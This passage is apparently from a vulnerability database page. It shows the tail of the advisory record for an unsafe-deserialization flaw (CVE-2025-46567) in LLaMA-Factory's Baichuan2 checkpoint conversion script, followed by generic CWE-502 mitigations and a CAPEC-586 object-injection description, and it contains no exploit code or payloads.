execution.\n\n### References\n\n- [torch.load() \u2014 PyTorch Docs](https://pytorch.org/docs/stable/generated/torch.load.html)\n- [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n\n### Credits\n\nDiscovered and reported by [Yu Rong](https://github.com/Anchor0221) and [Hao Fan](https://github.com/xhjy2020), 2025-04-23",
  "id": "GHSA-f2f7-gj54-6vpv",
  "modified": "2025-06-28T00:04:00Z",
  "published": "2025-04-23T22:21:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46567"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hiyouga/LLaMA-Factory"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/blob/main/scripts/convert_ckpt/llamafy_baichuan2.py#L35"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LLaMA-Factory Allows Arbitrary Code Execution via Unsafe Deserialization in Ilamafy_baichuan2.py"
}

Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Mitigation
Implementation

Explicitly define a final object() to prevent deserialization.

Mitigation
Architecture and Design Implementation
  • Make fields transient to protect them from deserialization.
  • An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Implementation

Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.

Mitigation
Architecture and Design Implementation

Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-586: Object Injection

An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.